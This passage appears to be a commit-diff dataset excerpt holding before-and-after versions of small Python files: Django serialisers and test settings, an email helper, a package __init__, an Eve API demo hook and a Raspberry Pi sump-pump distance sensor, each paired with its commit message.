choices = fields.ManySerialiserField(serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
<commit_msg>Add attribute to choices field declaration<commit_after>
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll,')
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField('choices_set.all', serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
a3c49c490ffe103f759b935bae31c37c05d26e81
|
tests/settings.py
|
tests/settings.py
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '/tmp/django-formtools-tests.db',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
Use a filesystem db and add the sites app to fix a test failure.
|
Use a filesystem db and add the sites app to fix a test failure.
|
Python
|
bsd-3-clause
|
gchp/django-formtools,thenewguy/django-formtools,lastfm/django-formtools,barseghyanartur/django-formtools,thenewguy/django-formtools,barseghyanartur/django-formtools,gchp/django-formtools,lastfm/django-formtools
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
Use a filesystem db and add the sites app to fix a test failure.
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '/tmp/django-formtools-tests.db',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
<commit_before># -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
<commit_msg>Use a filesystem db and add the sites app to fix a test failure.<commit_after>
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '/tmp/django-formtools-tests.db',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
Use a filesystem db and add the sites app to fix a test failure.# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '/tmp/django-formtools-tests.db',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
<commit_before># -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
<commit_msg>Use a filesystem db and add the sites app to fix a test failure.<commit_after># -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '/tmp/django-formtools-tests.db',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
36b10d57a812b393c73fe3b4117cc133d0f9d110
|
templatemailer/mailer.py
|
templatemailer/mailer.py
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
:param user: User instance or recipient email addres
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
### send email
send_email_f(
user.pk if user else None,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
:param user: User instance or recipient email addres
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
try:
user = user.pk
except AttributeError:
pass
### send email
send_email_f(
user,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
Fix AttributeError when supplying email address as user
|
Fix AttributeError when supplying email address as user
|
Python
|
mit
|
tuomasjaanu/django-templatemailer
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
:param user: User instance or recipient email addres
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
### send email
send_email_f(
user.pk if user else None,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
Fix AttributeError when supplying email address as user
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
:param user: User instance or recipient email addres
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
try:
user = user.pk
except AttributeError:
pass
### send email
send_email_f(
user,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
<commit_before>import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
:param user: User instance or recipient email addres
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
### send email
send_email_f(
user.pk if user else None,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
<commit_msg>Fix AttributeError when supplying email address as user<commit_after>
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
:param user: User instance or recipient email addres
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
try:
user = user.pk
except AttributeError:
pass
### send email
send_email_f(
user,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
:param user: User instance or recipient email addres
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
### send email
send_email_f(
user.pk if user else None,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
Fix AttributeError when supplying email address as userimport logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
:param user: User instance or recipient email addres
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
try:
user = user.pk
except AttributeError:
pass
### send email
send_email_f(
user,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
<commit_before>import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
:param user: User instance or recipient email addres
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
### send email
send_email_f(
user.pk if user else None,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
<commit_msg>Fix AttributeError when supplying email address as user<commit_after>import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
:param user: User instance or recipient email addres
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
try:
user = user.pk
except AttributeError:
pass
### send email
send_email_f(
user,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
359cab09d0cf7de375b43f82f9a9507f3c84cd34
|
distutilazy/__init__.py
|
distutilazy/__init__.py
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.0"
__all__ = ("clean", "pyinstaller", "command")
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.1"
__all__ = ("clean", "command", "pyinstaller", "test")
|
Add test to __all__ in package, bump version to 0.4.1
|
Add test to __all__ in package, bump version to 0.4.1
|
Python
|
mit
|
farzadghanei/distutilazy
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.0"
__all__ = ("clean", "pyinstaller", "command")
Add test to __all__ in package, bump version to 0.4.1
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.1"
__all__ = ("clean", "command", "pyinstaller", "test")
|
<commit_before>"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.0"
__all__ = ("clean", "pyinstaller", "command")
<commit_msg>Add test to __all__ in package, bump version to 0.4.1<commit_after>
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.1"
__all__ = ("clean", "command", "pyinstaller", "test")
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.0"
__all__ = ("clean", "pyinstaller", "command")
Add test to __all__ in package, bump version to 0.4.1"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.1"
__all__ = ("clean", "command", "pyinstaller", "test")
|
<commit_before>"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.0"
__all__ = ("clean", "pyinstaller", "command")
<commit_msg>Add test to __all__ in package, bump version to 0.4.1<commit_after>"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.1"
__all__ = ("clean", "command", "pyinstaller", "test")
|
698ab729f60bdb1a4b280bf6f93e9faa0e1b63f9
|
run-hooks.py
|
run-hooks.py
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['CODEMOTION'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['PYCON BELARUS'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
Prepare for PyCon Belarus 2018
|
Prepare for PyCon Belarus 2018
|
Python
|
bsd-3-clause
|
nicolaiarocci/eve-demo
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['CODEMOTION'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
Prepare for PyCon Belarus 2018
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['PYCON BELARUS'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
<commit_before># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['CODEMOTION'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
<commit_msg>Prepare for PyCon Belarus 2018<commit_after>
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['PYCON BELARUS'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['CODEMOTION'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
Prepare for PyCon Belarus 2018# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['PYCON BELARUS'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
<commit_before># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['CODEMOTION'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
<commit_msg>Prepare for PyCon Belarus 2018<commit_after># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
A demostration of a simple API powered by Eve REST API.
The live demo is available at eve-demo.herokuapp.com. Please keep in mind
that the it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['PYCON BELARUS'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
8d56fe74b373efe2dd3bbaffbde9eddd6fae6da7
|
piot/sensor/sumppump.py
|
piot/sensor/sumppump.py
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
# Quick explaination of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
# Quick explaination of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
return distance
|
Return distance from sump pump sensor
|
Return distance from sump pump sensor
|
Python
|
mit
|
tnewman/PIoT,tnewman/PIoT,tnewman/PIoT
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
# Quick explaination of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
Return distance from sump pump sensor
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
# Quick explaination of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
return distance
|
<commit_before>import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
# Quick explaination of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
<commit_msg>Return distance from sump pump sensor<commit_after>
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
# Quick explaination of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
return distance
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
